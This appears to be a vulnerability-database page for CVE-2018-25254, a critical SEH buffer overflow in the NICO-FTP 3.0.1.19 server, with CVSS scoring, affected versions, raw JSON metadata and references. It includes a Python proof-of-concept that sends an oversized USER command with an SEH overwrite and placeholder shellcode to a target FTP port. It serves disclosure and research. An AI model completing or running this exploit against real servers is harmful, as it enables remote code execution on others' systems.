Security Vulnerability Report
CVE-2018-25254 CVSS 9.8 CRITICAL

Published: 2026-04-04 14:16:22
Last Modified: 2026-04-27 13:26:41

Description

NICO-FTP 3.0.1.19 contains a structured exception handler buffer overflow vulnerability that allows remote attackers to execute arbitrary code by sending crafted FTP commands. Attackers can connect to the FTP service and send oversized data in response handlers to overwrite SEH pointers and redirect execution to injected shellcode.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nico-ftp_project:nico-ftp:*:*:*:*:*:*:*:* - VULNERABLE
NICO-FTP 3.0.1.19

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket

# Target configuration
target_ip = "192.168.1.100"
target_port = 21

# Payload construction
# Offset to overwrite SEH (Example value, actual offset requires debugging)
offset = b"A" * 1000
# Next SEH record (pop pop ret sequence bypass)
nseh = b"\xeb\x06\x90\x90"  # short jump + nops
# SEH handler address (Pop Pop Ret from non-ASLR module)
seh = b"\xaf\x11\x50\x62"  # Example address
# Shellcode (calc.exe or reverse shell)
shellcode = b"\xcc" * 300
padding = b"C" * (5000 - len(offset) - len(nseh) - len(seh) - len(shellcode))
payload = offset + nseh + seh + shellcode + padding

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target_ip, target_port))
    print(f"[+] Connected to {target_ip}:{target_port}")
    # Sending malicious command to trigger overflow
    s.send(b"USER " + payload + b"\r\n")
    print("[+] Payload sent")
    s.close()
except Exception as e:
    print(f"[-] Error: {e}")

Raw JSON Data

JSON
{"cve": {"id": "CVE-2018-25254", "sourceIdentifier": "[email protected]", "published": "2026-04-04T14:16:21.743", "lastModified": "2026-04-27T13:26:40.773", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NICO-FTP 3.0.1.19 contains a structured exception handler buffer overflow vulnerability that allows remote attackers to execute arbitrary code by sending crafted FTP commands. Attackers can connect to the FTP service and send oversized data in response handlers to overwrite SEH pointers and redirect execution to injected shellcode."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", 
"Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nico-ftp_project:nico-ftp:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.0.1.19", "matchCriteriaId": "E21A9A8B-2157-4078-9F5A-1FE4F9A11C74"}]}]}], "references": [{"url": "https://en.softonic.com/download/nico-ftp/windows/post-download", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/45442", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/nico-ftp-buffer-overflow-seh", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}